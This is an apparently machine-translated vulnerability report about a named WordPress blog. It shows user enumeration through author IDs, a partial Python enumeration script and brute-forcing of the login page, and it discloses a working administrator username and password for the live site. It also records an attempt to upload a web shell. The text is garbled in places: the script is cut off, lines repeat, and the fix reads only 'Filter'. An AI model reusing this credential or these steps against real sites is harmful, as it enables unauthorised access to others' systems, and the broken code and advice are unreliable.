Multiple weak passwords in a station on the 19th floor (with test scripts)

Multiple weak passwords in a station on the 19th floor (with test scripts)

Multiple weak passwords in a station on the 19th floor (with test scripts)

Vulnerability system http://blog.19ued.com/

The WordPress blog system is used.

Based on WP defects, We can traverse the user name.

Http://blog.19ued.com /? Author = 1

...



Http://blog.19ued.com /? Author = 100

In order to quickly traverse the system, we wrote a simple script for the wp system to capture users.
 

import sysimport osimport reimport argparseimport urllib2parser = argparse.ArgumentParser(description="This is a value")parser.add_argument('--url',action="store",dest="url")given_args = parser.parse_args()url = given_args.urlfor i in range(1,50):    geturl = url+"?author=%d" % i    print geturl    try:        request = urllib2.urlopen(geturl)        data = request.read()    except urllib2.HTTPError, e:        data = e.read()    p = re.compile(r'

Test
 

Username obtained
 

The script was also written for brute-force cracking, but this tool can be used for better burpsuite.

Http://blog.19ued.com/wp-login.php backend

Obtain the username and password through brute force cracking.
 

After logging on to the console, we found that the 403 limit was imposed, so we can go from the homepage to the background.

Attackers can log on to zhanlijun/123456 to find the administrator privilege.


 

Although it is administrator permission, the upload directory has the write permission and cannot upload the shell,

The template editing area does not have the modification permission. It's really a dog, and you haven't thought of any other shell method yet. Let's just go here.
 

 

 

 

 

Solution:

Filter